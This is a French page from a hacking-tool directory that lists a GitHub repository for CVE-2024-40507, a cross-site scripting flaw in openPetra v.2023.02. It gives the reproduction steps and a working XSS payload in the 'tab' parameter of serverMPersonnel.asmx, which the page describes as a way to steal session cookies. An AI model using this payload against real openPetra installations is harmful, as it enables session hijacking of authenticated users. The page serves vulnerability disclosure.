Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-40507 — OpenPetra v.2023.02 Utiliser CVE-2024-40507 | Kitploit
Outils/GitHubGitHub/jansen-c-moreira/cve-2024-40507
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubjansen-c-moreira/cve-2024-40507

CVE-2024-40507

OpenPetra v.2023.02 Utiliser CVE-2024-40507

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-40507

Vulnérabilité de Cross Site Scripting dans openPetra v.2023.02 via la fonction serverMPersonnel.asmx.

Description : Un utilisateur non authentifié peut voler les cookies d'un utilisateur authentifié en exploitant une XSS dans openPetra v.2023.02 via la fonction serverMPersonnel.asmx.

Version du produit vulnérable : openPetra v.2023.02
Auteur CVE : Jansen Moreira Date : 13/07/2024
CVE : CVE-2024-40507
Lien CVE : https://www.cve.org/CVERecord?id=CVE-2024-40507
Lien NVD : https://nvd.nist.gov/vuln/detail/CVE-2024-40507
Lien Tenable : https://www.tenable.com/cve/CVE-2024-40507
Confirmé le : 13/07/2024
Testé sur : Linux

Étapes pour reproduire :

1- Accédez à la page d'accueil
2- Utilisez le chemin suivant et ajoutez la charge utile XSS dans le paramètre tab. Ex. : http://target.com/api/serverMPersonnel.asmx?bnd=TMHospitalityWebServiceSoap&op=THospitalityWebConnector_Dummy&page=op&tab=x" onmouseover=alert(document.cookie) x="
3- Survolez l'élément d'index gauche pour déclencher la XSS

Charges utiles :
tab: x" onmouseover=alert(document.cookie) x="

Découvreur(s)/Crédits : Jansen Moreira

Télécharger l’outil